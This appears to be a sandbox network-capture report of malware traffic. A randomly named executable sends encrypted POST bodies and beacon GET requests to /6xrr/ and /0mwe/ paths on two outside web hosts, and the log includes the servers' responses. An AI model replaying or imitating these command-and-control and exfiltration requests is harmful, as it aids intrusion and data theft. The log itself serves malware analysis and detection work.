                                                      Dec 3, 2024 06:54:26.921627998 CET | 1236 | IN | Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                      Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                      Dec 3, 2024 06:54:26.921641111 CET | 1236 | IN | Data Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74
                                                      Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
                                                      Dec 3, 2024 06:54:26.921653032 CET | 1236 | IN | Data Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77
                                                      Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
                                                      Dec 3, 2024 06:54:26.921664953 CET | 1236 | IN | Data Raw: 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35
                                                      Data Ascii: 0,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65
                                                      Dec 3, 2024 06:54:26.922028065 CET | 1236 | IN | Data Raw: 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 63 72 69 73 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65
                                                      Data Ascii: x rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.4 | 49738 | 134.0.14.158 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 3, 2024 06:54:28.040745020 CET | 649 | OUT | POST /6xrr/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.aballanet.cat
                                                      Origin: http://www.aballanet.cat
                                                      Referer: http://www.aballanet.cat/6xrr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 35 35 47 70 7a 63 4f 31 2f 62 48 6d 53 62 65 30 6e 75 4b 57 4a 44 39 36 48 53 55 57 6b 4f 41 62 55 74 47 6f 4e 46 61 5a 79 65 66 62 36 72 6a 68 6f 55 70 70 5a 35 39 34 58 70 33 4b 61 64 2f 32 78 37 39 63 49 2f 54 39 31 39 44 6a 6c 42 47 2f 71 37 6e 59 2f 45 36 76 70 62 4b 5a 46 76 36 69 30 52 69 6b 6e 5a 4f 57 43 4c 54 30 52 79 77 74 2f 6b 6d 59 34 55 34 52 79 55 51 48 71 56 44 54 37 75 75 43 79 6b 4e 43 2f 47 51 44 41 43 39 44 4a 59 64 44 48 6e 36 4f 69 6c 34 54 34 52 65 6d 7a 79 39 6f 7a 5a 7a 67 47 78 65 2b 51 3d
                                                      Data Ascii: rfJh=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO255GpzcO1/bHmSbe0nuKWJD96HSUWkOAbUtGoNFaZyefb6rjhoUppZ594Xp3Kad/2x79cI/T919DjlBG/q7nY/E6vpbKZFv6i0RiknZOWCLT0Rywt/kmY4U4RyUQHqVDT7uuCykNC/GQDAC9DJYdDHn6Oil4T4Remzy9ozZzgGxe+Q=


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.4 | 49739 | 134.0.14.158 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 3, 2024 06:54:30.698199034 CET | 10731 | OUT | POST /6xrr/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.aballanet.cat
                                                      Origin: http://www.aballanet.cat
                                                      Referer: http://www.aballanet.cat/6xrr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 78 35 61 4c 37 63 63 6d 48 62 47 6d 53 62 43 6b 6e 76 4b 57 49 66 39 36 2b 36 55 57 34 77 41 5a 63 74 48 4c 56 46 63 73 47 65 57 62 36 72 38 52 6f 58 6a 4a 5a 67 39 34 48 74 33 4b 4b 64 2f 32 78 37 39 66 51 2f 56 70 70 39 42 6a 6c 43 57 76 71 2f 6a 59 2f 73 36 76 77 6d 4b 5a 52 2f 36 54 55 52 6a 45 33 5a 4a 6b 36 4c 50 6b 52 6e 7a 74 2f 43 6d 59 6c 45 34 52 75 6d 51 48 65 72 44 56 48 75 74 47 2f 4e 4a 51 50 48 46 7a 49 4b 72 68 78 35 53 53 33 45 79 75 79 43 35 6a 6b 2b 4d 58 2f 71 32 5a 65 43 6e 52 4f 6d 61 2b 70 67 33 69 45 38 68 53 55 77 75 35 70 79 34 52 39 66 62 4d 65 31 4b 55 69 46 6a 48 6b 46 42 2f 54 79 30 57 63 50 41 45 30 71 69 35 57 75 34 41 45 48 30 4d 33 32 31 70 36 63 68 4d 34 5a 77 75 4e 50 75 38 4b 35 30 7a 31 77 34 53 52 79 52 42 47 41 6f 30 47 76 77 6c 72 30 78 68 32 74 58 78 6a 4d 45 67 37 2f 50 4a 73 68 55 66 44 72 6a 38 4c 4b 74 72 35 74 35 [TRUNCATED]
                                                      Data Ascii: rfJh= [TRUNCATED]
                                                      Dec 3, 2024 06:54:32.313112020 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:54:31 GMT
                                                      Server: Apache
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Transfer-Encoding: chunked
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                      Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                      Dec 3, 2024 06:54:32.313134909 CET | 1236 | IN | Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69
                                                      Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
                                                      Dec 3, 2024 06:54:32.313147068 CET | 1236 | IN | Data Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                      Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
                                                      Dec 3, 2024 06:54:32.313381910 CET | 1236 | IN | Data Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e
                                                      Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
                                                      Dec 3, 2024 06:54:32.313394070 CET | 724 | IN | Data Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65
                                                      Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
                                                      Dec 3, 2024 06:54:32.313405991 CET | 1236 | IN | Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                      Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                      Dec 3, 2024 06:54:32.313420057 CET | 1236 | IN | Data Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74
                                                      Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
                                                      Dec 3, 2024 06:54:32.313431025 CET | 448 | IN | Data Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77
                                                      Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
                                                      Dec 3, 2024 06:54:32.313711882 CET | 1236 | IN | Data Raw: 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30
                                                      Data Ascii: ient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 10
                                                      Dec 3, 2024 06:54:32.313724041 CET | 1236 | IN | Data Raw: 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61
                                                      Data Ascii: 02,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36p


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.4 | 49742 | 134.0.14.158 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 3, 2024 06:54:33.348176003 CET | 364 | OUT | GET /6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.aballanet.cat
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:54:34.898689985 CET | 492 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Tue, 03 Dec 2024 05:54:34 GMT
                                                      Server: Apache
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      X-Redirect-By: WordPress
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Location: http://aballanet.cat/6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLO
                                                      Content-Length: 0
                                                      Content-Type: text/html; charset=UTF-8


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.4 | 49758 | 103.224.182.242 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 3, 2024 06:54:41.184705019 CET | 620 | OUT | POST /0mwe/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.madhf.tech
                                                      Origin: http://www.madhf.tech
                                                      Referer: http://www.madhf.tech/0mwe/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 46 34 58 73 73 64 63 57 39 64 59 6d 54 58 30 6d 2b 4f 7a 6d 48 6d 71 4d 79 70 4d 30 56 78 49 49 7a 4b 57 71 52 6f 65 2b 48 66 75 39 49 6a 46 68 63 2b 6a 56 6b 4f 69 58 70 79 7a 5a 77 54 31 46 45 39 46 57 45 44 34 32 5a 63 49 61 79 47 68 57 64 6f 74 4a 35 2f 6c 6a 4b 70 50 66 6f 66 43 4d 61 50 4b 69 6b 62 68 52 79 68 64 45 2f 38 78 48 43 7a 74 4b 32 2f 39 39 46 67 64 32 79 6a 48 63 63 4d 4f 39 2b 6b 44 33 69 77 33 77 49 31 64 7a 51 44 4f 6a 62 42 32 4f 32 4c 64 61 63 32 71 32 55 58 35 6c 70 73 68 6e 5a 6e 47 62 32 6e 58 2f 61 69 76 36 57 41 39 68 58 7a 32 2f 52 49 69 4f 6b 67 3d 3d
                                                      Data Ascii: rfJh=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2UX5lpshnZnGb2nX/aiv6WA9hXz2/RIiOkg==
                                                      Dec 3, 2024 06:54:42.445481062 CET | 871 | IN | HTTP/1.1 200 OK
                                                      date: Tue, 03 Dec 2024 05:54:42 GMT
                                                      server: Apache
                                                      set-cookie: __tad=1733205282.4810970; expires=Fri, 01-Dec-2034 05:54:42 GMT; Max-Age=315360000
                                                      vary: Accept-Encoding
                                                      content-encoding: gzip
                                                      content-length: 576
                                                      content-type: text/html; charset=UTF-8
                                                      connection: close
                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                      Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       6 | 192.168.2.4 | 49764 | 103.224.182.242 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:54:43.840186119 CET | 640 | OUT | POST /0mwe/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.madhf.tech
                                                      Origin: http://www.madhf.tech
                                                      Referer: http://www.madhf.tech/0mwe/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 4b 39 49 42 64 68 66 2f 6a 56 6a 4f 69 58 6d 53 7a 51 76 6a 31 4f 45 39 34 72 45 44 30 32 5a 63 4d 61 79 43 78 57 64 37 46 4f 35 76 6c 6c 44 4a 50 5a 32 76 43 4d 61 50 4b 69 6b 62 45 38 79 68 46 45 38 50 35 48 43 58 5a 46 71 76 39 38 43 67 64 32 34 44 47 62 63 4d 4f 36 2b 6c 4f 59 69 79 50 77 49 31 74 7a 51 57 36 67 4d 52 33 6b 79 4c 63 77 59 55 37 5a 4e 58 41 57 6f 4d 39 63 51 44 65 6d 33 68 61 6c 4c 54 4f 74 45 41 5a 53 4b 30 2f 4c 63 4c 66 48 2f 69 34 6e 78 39 50 33 63 64 50 4b 31 66 2b 43 73 6f 2b 48 42 6a 63 3d
                                                      Data Ascii: rfJh=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNK9IBdhf/jVjOiXmSzQvj1OE94rED02ZcMayCxWd7FO5vllDJPZ2vCMaPKikbE8yhFE8P5HCXZFqv98Cgd24DGbcMO6+lOYiyPwI1tzQW6gMR3kyLcwYU7ZNXAWoM9cQDem3halLTOtEAZSK0/LcLfH/i4nx9P3cdPK1f+Cso+HBjc=
                                                       Dec 3, 2024 06:54:45.113013983 CET | 871 | IN | HTTP/1.1 200 OK
                                                      date: Tue, 03 Dec 2024 05:54:44 GMT
                                                      server: Apache
                                                      set-cookie: __tad=1733205284.6289982; expires=Fri, 01-Dec-2034 05:54:44 GMT; Max-Age=315360000
                                                      vary: Accept-Encoding
                                                      content-encoding: gzip
                                                      content-length: 576
                                                      content-type: text/html; charset=UTF-8
                                                      connection: close
                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED]
                                                      Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
